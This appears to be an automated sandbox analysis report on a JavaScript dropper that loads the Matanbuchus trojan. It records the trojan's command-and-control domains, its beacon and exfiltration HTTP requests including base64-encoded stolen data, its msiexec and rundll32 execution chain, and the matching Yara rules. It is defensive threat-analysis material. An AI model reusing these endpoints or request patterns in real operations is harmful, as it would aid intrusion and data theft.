Windows Analysis Report
Doc_21-04-53.js

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49829

Source: global traffic

TCP traffic: 192.168.2.5:49733 -> 185.234.216.175:4443

Source: Joe Sandbox View

ASN Name: SPRINT-SDCPL SPRINT-SDCPL

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 5_2_7FB34390 socket,gethostbyname,connect,send,recv,std::ios_base::_Ios_base_dtor,

5_2_7FB34390

Source: global traffic	HTTP traffic detected: GET /klog.php HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows InstallerHost: axizlhop.life
Source: global traffic	HTTP traffic detected: GET /AdminAccounts.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: security-patches.systemsCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /verif.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: security-patches.systemsCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /verif.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: security-patches.systemsCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /verif.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: security-patches.systemsCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /verif.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: security-patches.systemsCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: axizlhop.life
Source: global traffic	DNS traffic detected: DNS query: security-patches.systems

Source: unknown

HTTP traffic detected: POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1User-Agent: Microsoft-WNS/10.0Host: security-patches.systemsContent-Length: 525Content-Type: application/x-www-form-urlencodedAccept-Language: fr-CAData Raw: 64 61 74 61 3d 65 79 4a 42 62 6c 64 47 61 43 49 36 49 6e 4e 30 56 32 67 31 54 30 5a 4d 51 32 31 50 61 57 35 34 64 7a 30 69 4c 43 4a 47 63 33 52 4d 49 6a 6f 69 63 54 68 79 54 6a 64 77 54 58 42 43 62 6b 74 70 4b 32 31 6e 52 58 5a 44 62 6c 4e 79 61 45 45 39 49 69 77 69 53 47 52 57 55 58 42 42 49 6a 6f 69 63 69 38 72 52 6a 5a 6a 51 6a 4a 4d 56 6c 68 71 49 69 77 69 55 55 5a 61 65 57 6c 70 56 56 68 5a 49 6a 6f 69 4d 6d 4a 32 56 57 35 61 55 58 6b 69 4c 43 4a 53 59 6d 39 30 49 6a 6f 69 64 57 4e 68 65 54 51 72 51 6c 64 44 4d 6c 68 6d 49 69 77 69 55 32 4a 61 56 32 35 59 49 6a 6f 69 4d 7a 64 71 55 6d 31 61 56 58 63 69 4c 43 4a 5a 61 30 70 58 49 6a 70 62 49 6e 52 50 61 55 77 69 58 53 77 69 59 32 5a 4c 57 43 49 36 49 6a 4a 6e 50 54 30 69 4c 43 4a 6f 54 6d 39 32 53 6d 30 69 4f 69 4a 77 4b 32 56 56 65 6d 4e 7a 63 30 5a 6f 62 58 5a 71 52 45 4a 69 4e 6c 56 58 63 6d 39 42 50 54 30 69 4c 43 4a 76 51 6e 56 4e 56 58 55 69 4f 69 4a 71 4b 31 64 48 65 44 68 73 4d 79 49 73 49 6e 4e 30 64 56 6b 69 4f 69 49 78 63 6d 70 61 62 56 45 39 50 53 49 73 49 6e 5a 76 53 6d 4d 69 4f 69 4a 74 54 32 46 78 65 58 63 39 50 53 49 73 49 6e 64 42 59 30 67 69 4f 69 4a 78 54 30 4e 50 65 57 4e 7a 4d 32 46 6e 50 54 30 69 4c 43 4a 33 55 57 56 53 53 43 49 36 49 6a 4a 4d 4d 30 45 32 63 7a 56 33 49 69 77 69 65 47 56 44 59 32 70 54 49 6a 6f 69 64 53 39 78 52 6a 4a 6e 50 54 30 69 4c 43 4a 35 61 57 6c 56 57 46 6b 69 4f 69 4a 79 59 6b 38 34 4c 7a 67 31 63 55 6c 47 4c 7a 52 32 51 55 34 32 4f 56 49 32 62 32 39 75 4e 56 52 72 64 32 77 33 5a 47 4a 76 61 6e 68 6f 55 58 64 54 56 6d 64 59 52 57 64 4a 50 53 4a 39 Data Ascii: data=eyJBbldGaCI6InN0V2g1T0ZMQ21PaW54dz0iLCJGc3RMIjoicThyTjdwTXBCbktpK21nRXZDblNyaEE9IiwiSGRWUXBBIjoici8rRjZjQjJMVlhqIiwiUUZaeWlpVVhZIjoiMmJ2VW5aUXkiLCJSYm90IjoidWNheTQrQldDMlhmIiwiU2JaV25YIjoiMzdqUm1aVXciLCJZa0pXIjpbInRPaUwiXSwiY2ZLWCI6IjJnPT0iLCJoTm92Sm0iOiJwK2VVemNzc0ZobXZqREJiNlVXcm9BPT0iLCJvQnVNVXUiOiJqK1dHeDhsMyIsInN0dVkiOiIxcmpabVE9PSIsInZvSmMiOiJtT2FxeXc9PSIsIndBY0giOiJxT0NPeWNzM2FnPT0iLCJ3UWVSSCI6IjJMM0E2czV3IiwieGVDY2pTIjoidS9xRjJnPT0iLCJ5aWlVWFkiOiJyYk84Lzg1cUlGLzR2QU42OVI2b29uNVRrd2w3ZGJvanhoUXdTVmdYRWdJPSJ9

Source: regsvr32.exe	String found in binary or memory: http://schemas.xml
Source: rundll32.exe, 00000005.00000002.3322423322.0000000004D33000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlfilename_too_long
Source: wscript.exe, 00000000.00000002.2094931329.000001FCB11D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093594028.000001FCAF3F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093653008.000001FCAF401000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093697322.000001FCAF3CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094205442.000001FCAF3E2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2094595142.000001FCAF3E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://axizlhop.life/klog.php
Source: wscript.exe, 00000000.00000003.2093594028.000001FCAF3F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093846419.000001FCAF3F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://axizlhop.life/klog.php6934511675634-100
Source: wscript.exe, 00000000.00000003.2094240029.000001FCAF3FD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094103772.000001FCAF3FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093925424.000001FCAF3F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2094675050.000001FCAF3FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://axizlhop.life/klog.php6934511675634-100;
Source: rundll32.exe, 00000005.00000003.2169062650.00000000027E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://security-patches.systems/
Source: rundll32.exe, 00000005.00000003.2169062650.00000000027E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://security-patches.systems/verif.aspx
Source: rundll32.exe, 00000005.00000003.2169062650.00000000027E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://security-patches.systems/verif.aspx4A
Source: rundll32.exe, 00000005.00000003.2169062650.00000000027E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://security-patches.systems/verif.aspxb
Source: rundll32.exe, 00000005.00000003.2169062650.00000000027E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://security-patches.systems/verif.aspxo
Source: rundll32.exe, 00000005.00000003.2169062650.00000000027E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://security-patches.systems/verif.aspxv

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown	HTTPS traffic detected: 104.21.40.3:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.234.216.175:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.234.216.175:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.234.216.175:443 -> 192.168.2.5:49795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.234.216.175:443 -> 192.168.2.5:49830 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 11.2.regsvr32.exe.7f100000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 11.2.regsvr32.exe.7f100000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 11.2.regsvr32.exe.7f100000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 11.2.regsvr32.exe.7f100000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 7.2.regsvr32.exe.7f7e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 7.2.regsvr32.exe.7f7e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 5.2.rundll32.exe.7fae0000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 5.2.rundll32.exe.7fae0000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 7.2.regsvr32.exe.7f7e0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 7.2.regsvr32.exe.7f7e0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 5.2.rundll32.exe.7fae0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 5.2.rundll32.exe.7fae0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000007.00000002.2414164418.0000000005753000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 00000007.00000002.2414164418.0000000005753000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000005.00000002.3322423322.0000000004D33000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 00000005.00000002.3322423322.0000000004D33000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 0000000B.00000002.2937064236.00000000055EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 0000000B.00000002.2937064236.00000000055EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 0000000B.00000002.2937446106.000000007F100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 0000000B.00000002.2937446106.000000007F100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Microsoft Windows Installer HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{000C1090-0000-0000-C000-000000000046}

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI4D8A.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSICA2D.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSICC41.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSICC71.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSICCA1.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSICD0F.tmp	Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSICA2D.tmp

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6C33D860	5_2_6C33D860
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB29D20	5_2_7FB29D20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB09830	5_2_7FB09830
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB2F830	5_2_7FB2F830
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB13740	5_2_7FB13740
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB3CDA9	5_2_7FB3CDA9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB34390	5_2_7FB34390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB21EB0	5_2_7FB21EB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB41EE0	5_2_7FB41EE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB59D9E	5_2_7FB59D9E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1FD40	5_2_7FB1FD40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1DAC0	5_2_7FB1DAC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB4D91B	5_2_7FB4D91B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB5160D	5_2_7FB5160D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB4D5B6	5_2_7FB4D5B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB4D228	5_2_7FB4D228
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB54EFE	5_2_7FB54EFE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB4CEE0	5_2_7FB4CEE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB3AAF0	5_2_7FB3AAF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1A800	5_2_7FB1A800
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB5C640	5_2_7FB5C640
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB48490	5_2_7FB48490
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB464ED	5_2_7FB464ED
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB29D20	5_2_7FB29D20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1C160	5_2_7FB1C160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_6B6251C0	7_2_6B6251C0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F813740	7_2_7F813740
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F821EB0	7_2_7F821EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F841EE0	7_2_7F841EE0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F829D20	7_2_7F829D20
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F81A800	7_2_7F81A800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F82F830	7_2_7F82F830
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F81C160	7_2_7F81C160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F133740	11_2_7F133740
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F141EB0	11_2_7F141EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F161EE0	11_2_7F161EE0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F149D20	11_2_7F149D20
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F13A800	11_2_7F13A800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F14F830	11_2_7F14F830
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F13C160	11_2_7F13C160

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 7FB4F35D appears 144 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 7FB413A0 appears 42 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 7F84F35D appears 128 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 7F16F35D appears 132 times

Source: Doc_21-04-53.js

Initial sample: Strings found which are bigger than 50

Source: 11.2.regsvr32.exe.7f100000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 11.2.regsvr32.exe.7f100000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 11.2.regsvr32.exe.7f100000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 11.2.regsvr32.exe.7f100000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 7.2.regsvr32.exe.7f7e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
